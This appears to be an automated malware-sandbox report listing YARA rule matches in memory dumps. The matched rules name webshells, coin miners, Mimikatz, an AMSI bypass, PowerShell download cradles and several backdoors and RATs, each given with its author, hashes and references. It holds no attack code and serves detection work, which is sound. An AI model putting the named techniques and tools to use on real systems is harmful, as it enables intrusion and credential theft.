Source: 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp, type: MEMORY Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp, type: MEMORY Matched rule: HackTool_Samples description = Hacktool, score =
Source: 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp, type: MEMORY Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = file
Source: 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp, type: MEMORY Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
Source: 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18347582446.0000015B1B490000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18341085023.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 00000023.00000003.18341085023.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18341085023.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18341085023.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18327508493.0000015B1B6A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000023.00000003.18403655888.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18403655888.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18409201535.0000015B1B281000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18409201535.0000015B1B281000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000023.00000003.18410667523.0000015B1B2B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18410667523.0000015B1B2B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.18324208366.0000015B1BE5C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18311556427.0000015B1BE5C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000023.00000003.18321252333.0000015B1B6A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000023.00000003.18321252333.0000015B1B6A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp, type: MEMORY Matched rule: korlia author = Nick Hoffman, reference = http://www.morphick.com/resources/lab-blog/curious-korlia, company = Morphick, information = korlia malware found in apt dump
Source: 00000023.00000003.18307459590.0000015B1A504000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18332888598.0000015B1C174000.00000004.00000001.sdmp, type: MEMORY Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000023.00000003.18337113449.0000015B1BB10000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
Source: 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_generic_eval date = 2021/01/07, author = Arnim Rupp, description = Generic PHP webshell which uses any eval/exec function in the same line with user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 90c5cc724ec9cf838e4229e5e08955eec4d7bf95
Source: 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp, type: MEMORY Matched rule: ChinaChopper_Generic date = 2015/03/10, author = Florian Roth, description = China Chopper Webshells - PHP and ASPX, reference = https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-china-chopper-report.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18402637724.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18402637724.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp, type: MEMORY Matched rule: PoisonIvy_3 filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, cape_type = PoisonIvy Payload, ref = http://malwareconfig.com/stats/PoisonIvy
Source: 00000023.00000003.18297289690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_jsp_by_string date = 2021/01/09, author = Arnim Rupp, description = JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 06b42d4707e7326aff402ecbb585884863c6351a
Source: 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp, type: MEMORY Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18348306594.0000015B1B176000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18302210268.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000023.00000003.18417425467.0000015B1B2B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18417425467.0000015B1B2B1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp, type: MEMORY Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp, type: MEMORY Matched rule: CVE_2018_4878_0day_ITW Description = This signature is mostly public sourced and detects an in-the-wild exploit for CVE-2018-4878., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18418037701.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18418037701.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18418460951.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18418460951.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18290582002.0000015B1BF65000.00000004.00000001.sdmp, type: MEMORY Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 00000023.00000003.18290582002.0000015B1BF65000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18340382300.0000015B1BB10000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000023.00000003.18418909373.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18418909373.0000015B1B2C1000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp, type: MEMORY Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp, type: MEMORY Matched rule: gh0st author = https://github.com/jackcr/
Source: 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000023.00000003.18309001390.0000015B1AF24000.00000004.00000001.sdmp, type: MEMORY Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000023.00000003.18347963996.0000015B1BF22000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
